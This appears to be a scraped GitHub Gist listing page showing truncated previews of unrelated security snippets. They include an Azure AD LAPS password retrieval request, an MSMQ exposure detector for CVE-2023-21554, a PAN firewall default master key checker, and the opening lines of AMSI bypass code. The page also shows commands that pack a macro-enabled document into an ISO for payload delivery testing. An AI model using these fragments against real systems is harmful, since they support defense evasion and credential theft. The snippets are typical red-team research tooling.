This document describes the configuration options for Ghostty, a terminal emulator. The following sections detail the various settings, grouped by category, with explanations and configuration options formatted for clarity and suitable for PDF export via Pandoc.
Dave Hardy davehardy20
alexjsteffen
/ ghostty.config.md
Created
February 23, 2025 02:24
xpn
/ AADLAPS_Request.txt
Last active
January 30, 2024 10:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1 | |
| ocp-client-version: 1.0 | |
| client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b | |
| ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest | |
| SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1 | |
| FeatureFlag: 00000047 | |
| Cache-Control: no-store, no-cache | |
| Authorization: Bearer [AAD-JWT-HERE] | |
| Accept-Encoding: gzip |
tothi
/ msmq_detect.py
Created
April 17, 2023 00:09
Detect whether the remote MSMQ service on 1801/tcp is enabled or not by sending a valid message to the target
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # detect whether the remote MSMQ service on 1801/tcp is enabled or not | |
| # by sending a valid message to the target | |
| # | |
| # resources: | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b7cc2590-a617-45df-b6a3-1f31102b36fb | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af | |
| # |
Nmap currently has no way to detect whether the service running on TCP port 1801 is [Microsoft Message Queuing (MSMQ)][wikipedia_msmq]. The file msmq-service-probe here has been developed to give Nmap the capability to detect MSMQ. The objective is to help identify assets with MSMQ exposed, that may be vulnerable to [CVE-2023-21554][nist_cve_2023_21554], aka QueueJumper.
This works by sending a MSMQ packet to port 1801 and checking if the response matches an expected fingerprint.
You can run this probe as follows:
jhochwald
/ install-DotNET-Linux-ARM64.sh
Last active
May 23, 2025 20:09
Install the PowerShell 7.3.8 binary release on a Debian ARM64 Linux box, or Debian ARM64 based WSL. There is no DEB package, yet!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install the dependencies | |
| apt install libc6 libgcc1 libgssapi-krb5-2 libicu72 libssl1.1 libstdc++6 zlib1g -y | |
| # Get the .NET install script | |
| wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh | |
| # Make it executable | |
| chmod +x ./dotnet-install.sh | |
| # Install the .NET SDK 7.0 (STS) for ARM64 |
mgeeky
/ gist:82d6abe0508ae81f107689864fb5dfc0
Created
September 6, 2022 12:09
office-to-iso-with-motw.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Pack macro-enabled doc to ISO | |
| py PackMyPayload.py Resume1337.xlsm test11.iso | |
| # Apply MOTW on that ISO | |
| Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' | |
| # Mount it | |
| Mount-DiskImage -ImagePath test11.iso |
rqu1
/ checkmk.py
Last active
August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from hashlib import md5, sha1 | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.backends import default_backend | |
| from base64 import b64encode, b64decode | |
| import sys, time | |
| import requests | |
| DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8' | |
| class PanCrypt(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Setup native functions so they can be called through c# | |
| $win32 = @" | |
| using System.Runtime.InteropServices; | |
| using System; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
NewerOlder